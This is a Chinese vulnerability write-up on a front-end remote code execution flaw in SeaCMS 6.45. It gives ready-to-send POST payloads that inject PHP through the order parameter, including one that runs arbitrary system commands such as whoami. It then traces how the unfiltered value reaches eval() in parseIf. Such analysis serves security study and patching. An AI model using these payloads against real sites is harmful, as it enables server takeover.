环境搭建

1、下载安装包

下载地址:

链接:https://pan.baidu.com/s/1uw_VnxnvG4GGEae4TRsGGw

密码:cd48

2、常规安装

漏洞复现

poc1:

http://127.0.0.1/seacms645/search.php

post:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}

poc2:

POST:

searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);//}{end if}&func=system&cmd=whoami

searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&func=system&cmd=whoami

漏洞分析

0x00 代码执行简单流程

0x01 分析

总的来说就是:$order参数没做严格的限制,就将其传入了模板文件中,然后使用eval()执行模板中包含$order的代码,通过闭合拼接语句的方式,插入恶意代码,实现远程命令执行。

首先是从seacms_6.45/search.php入手,这个文件包含了seacms/include/common.php,在common.php中第45-48行,将GET,POST等请求传入的全局变量中的键值对转换成变量,并对其中的值使用addslashes()进行处理:

function _RunMagicQuotes(&$svar)

{

	if(!get_magic_quotes_gpc())

	{

		if( is_array($svar) )

		{

			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);

		}

		else

		{

			$svar = addslashes($svar);

		}

	}

	return $svar;

}

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

	foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);

}

在seacms/search.php文件第63行,echoSearchPage()函数中,将$order变量注册成全局变量:

global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;

而在search.php中,执行echoSearchPage()函数之前,没有对$order变量进行处理。在echoSearchPage()函数中,使用$searchtype来选择使用的模板文件:

if(intval($searchtype)==5)

	{

		$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";

		$typeStr = !empty($tid)?intval($tid).'_':'0_';

		$yearStr = !empty($year)?PinYin($year).'_':'0_';

		$letterStr = !empty($letter)?$letter.'_':'0_';

		$areaStr = !empty($area)?PinYin($area).'_':'0_';

		$orderStr = !empty($order)?$order.'_':'0_';

		$jqStr = !empty($jq)?$jq.'_':'0_';

		$cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;

		$pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");

	}else

	{

		if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);

		$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";

		$cacheName="parse_search_";

		$pSize = getPageSizeOnCache($searchTemplatePath,"search","");

	}

在if语句中可以看到,当$searchtype 的值为5的时候,传入了%order参数,因此这里的$searchtype需要取值5。

下面153行,将模板文件读取到$content变量中:

$content = parseSearchPart($searchTemplatePath);

接着在155-173行替换标签。其中第158行使用$order替换了模板中{searchpage:ordername}标签:

<a href="{searchpage:order-time-link}" {if:"{searchpage:ordername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>

<a href="{searchpage:order-hit-link}" {if:"{searchpage:ordername}"=="hit"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderaddtime">最近热播</a>

<a href="{searchpage:order-score-link}" {if:"{searchpage:ordername}"=="score"} class="btn btn-success" {else} class="btn btn-default" {end if} id="ordergold">评分最高</a>

接着,在本文件的第212行:

$content=$mainClassObj->parseIf($content);

跟进去,在seacms\include\main.class.php中第3098-3147行中:

function parseIf($content)

{

    if (strpos($content, '{if:') === false) {

        return $content;

    } else {

        $labelRule = buildregx("{if:(.*?)}(.*?){end if}", "is");

        $labelRule2 = "{elseif";

        $labelRule3 = "{else}";

        preg_match_all($labelRule, $content, $iar);

        $arlen = count($iar[0]);

        $elseIfFlag = false;

        for ($m = 0; $m < $arlen; $m++) {

            $strIf = $iar[1][$m];

            $strIf = $this->parseStrIf($strIf);

            $strThen = $iar[2][$m];

            $strThen = $this->parseSubIf($strThen);

            if (strpos($strThen, $labelRule2) === false) {

                if (strpos($strThen, $labelRule3) >= 0) {

                    $elsearray = explode($labelRule3, $strThen);

                    $strThen1 = $elsearray[0];

                    $strElse1 = $elsearray[1];

                    @eval("if(" . $strIf . "){\$ifFlag=true;}else{\$ifFlag=false;}");

                    if ($ifFlag) {

                        $content = str_replace($iar[0][$m], $strThen1, $content);

                    } else {

                        $content = str_replace($iar[0][$m], $strElse1, $content);

                    }

                } else {

                    @eval("if(" . $strIf . ") { \$ifFlag=true;} else{ \$ifFlag=false;}");

                    if ($ifFlag) {

                        $content = str_replace($iar[0][$m], $strThen, $content);

                    } else {

                        $content = str_replace($iar[0][$m], "", $content);

                    }

                }

            } else {

                $elseIfArray = explode($labelRule2, $strThen);

                $elseIfArrayLen = count($elseIfArray);

                $elseIfSubArray = explode($labelRule3, $elseIfArray[$elseIfArrayLen - 1]);

                $resultStr = $elseIfSubArray[1];

                $elseIfArraystr0 = addslashes($elseIfArray[0]);

                @eval("if({$strIf}){\$resultStr=\"{$elseIfArraystr0}\";}");

                for ($elseIfLen = 1; $elseIfLen < $elseIfArrayLen; $elseIfLen++) {

                    $strElseIf = getSubStrByFromAndEnd($elseIfArray[$elseIfLen], ":", "}", "");

                    $strElseIf = $this->parseStrIf($strElseIf);

                    $strElseIfThen = addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen], "}", "", "start"));

                    @eval("if(" . $strElseIf . "){\$resultStr=\"{$strElseIfThen}\";}");

                    @eval("if(" . $strElseIf . "){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");

                    if ($elseIfFlag) {

                        break;

                    }

                }

                $strElseIf0 = getSubStrByFromAndEnd($elseIfSubArray[0], ":", "}", "");

                $strElseIfThen0 = addslashes(getSubStrByFromAndEnd($elseIfSubArray[0], "}", "", "start"));

                if (strpos($strElseIf0, '==') === false && strpos($strElseIf0, '=') > 0) {

                    $strElseIf0 = str_replace('=', '==', $strElseIf0);

                }

                @eval("if(" . $strElseIf0 . "){\$resultStr=\"{$strElseIfThen0}\";\$elseIfFlag=true;}");

                $content = str_replace($iar[0][$m], $resultStr, $content);

            }

        }

        return $content;

    }

}

这段函数主要功能是将输入的参数与正则匹配,之后进入eval()函数执行。

正则:

3102: $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");

3105: preg_match_all($labelRule,$content,$iar);

要想进入到eval(),$content中必须含有{if:字符串,看代码执行流程,在eval()函数中,$strIf就是之前preg_match_all()中第一个(.*?)匹配出来的值。

@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");

在eval()中,要闭合前面的if语句,可以构造1)phpinfo();if(1,又要符合正则{if:(.?)}(.?){end if},再看标签:

<a href="{searchpage:order-time-link}" {if:"{searchpage:ordername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>

由于$order替换的是{searchpage:ordername},所以,在1)phpinfo();if(1基础上添加:

}{end if}{if:1)phpinfo();if(1}{end if}

漏洞利用的基本流程就是这样,简单来说,就是有个可控的变量没有经过过滤,就被带入了eval()中,导致了代码执行。

参考

https://mengsec.com/2018/08/06/SeaCMS-v6-45%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://github.com/SecWiki/CMS-Hunter/tree/master/seacms/SeaCMS%20v6.45%E5%89%8D%E5%8F%B0Getshell%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C

seacms_6.4.5 前台任意代码执行漏洞分析的更多相关文章

  1. 干货|CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞分析

    近期,国外安全研究员Andrew Danau,在参加夺旗赛(CTF: Capture the Flag)期间,偶然发现php-fpm组件处理特定请求时存在缺陷:在特定Nginx配置下,特定构造的请求会 ...

  2. phpcms前台任意代码执行漏洞(php<5.3)

    phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞 /phpsso_server/phpcms/libs/functions/global.fu ...

  3. Discuz! 6.x/7.x 版本 前台任意代码执行漏洞

    一.漏洞原理: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞. include/global.fun ...

  4. WordPress wp-includes/functions.php脚本远程任意代码执行漏洞

    漏洞名称: WordPress wp-includes/functions.php脚本远程任意代码执行漏洞 CNNVD编号: CNNVD-201309-166 发布时间: 2013-09-13 更新时 ...

  5. php 168任意代码执行漏洞之php的Complex (curly) syntax

    今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHt ...

  6. 20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞

    Ecshop 2.x/3.x SQL注入/任意代码执行漏洞 影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二 ...

  7. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  8. 修复Apache Log4j任意代码执行漏洞安全风险通告

    2021年12月10日 0x01漏洞背景 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了 ...

  9. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

随机推荐

  1. C++中const的特性

    目录(作用): 1:修饰变量,说明该变量不可以被改变: 2:修饰指针,分为只想常量的指针和自身是常量的指针 3:修饰引用,指向常量的引用,用于修饰形参,即避免了拷贝,有避免了函数对值的修改: 4:修改 ...

  2. python gdal 读取栅格数据

    1.gdal包简介 gdal是空间数据处理的开源包,其支持超过100种栅格数据类型,涵盖所有主流GIS与RS数据格式,包括Arc/Info ASCII Grid(asc),GeoTiff (tiff) ...

  3. [csu/coj 1079]树上路径查询 LCA

    题意:询问树上从u到v的路径是否经过k 思路:把树dfs转化为有根树后,对于u,v的路径而言,设p为u,v的最近公共祖先,u到v的路径必定是可以看成两条路径的组合,u->p,v->p,这样 ...

  4. java.sql.SQLException: The server time zone value 'Öйú±ê׼ʱ¼ä' is unrecognized的报错问题

    url的问题 这个是根据使用的数据库版本不同而出现的错误,mysql8.0以上版本在使用URL时如果使用的语句是 url=jdbc:mysql://localhost:3306/book 是会报错的, ...

  5. activiti工作流入门学习

    工作流一般在OA系统用的比较多,当然,只要有流程审批的地方都会用到,activiti只是开源的工作流中比较流行的一个,还有其他的开源的工作流,这里学习activiti工作流:前面部分是关于activi ...

  6. Web_php_unserialize

    0x01 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this-& ...

  7. Codeforces 1272E (Nearest Opposite Parity,反向建边)

    题意:给你n个数,每个数的值为a[i],每个点可以从i这号点跳转至(i - a[i]) 或 (i + a[i])点,点的范围为[1,n],然后问的是从偶数点跳至奇数点,从奇数点跳至偶数点的最少次数是多 ...

  8. call(),apply(),bind() 区别和用法

    call call 方法第一个参数是要绑定给this的值,后面传入的是一个参数列表.当第一个参数为null.undefined的时候,默认指向window. var arr = [1, 2, 3, 8 ...

  9. sonar 安装,centos7配置优化

    /etc/sysctl.conf /etc/systemd/system.conf /etc/security/limits.conf /proc/sys/fs/file-max /etc/secur ...

  10. vue的slot

    1.明确一点:分发内容是在父作用域内编译: 2.slot作为备用内容的条件:宿主元素为空且父元素没有要分发的内容. 3.具名slot:<slot name="XXX"> ...